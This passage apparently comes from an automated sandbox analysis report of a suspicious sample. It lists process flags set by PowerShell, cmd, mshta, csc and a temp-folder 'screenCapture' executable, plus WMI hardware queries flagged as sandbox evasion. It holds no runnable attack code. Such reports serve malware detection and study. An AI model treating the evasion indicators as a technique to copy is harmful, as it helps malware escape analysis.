      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
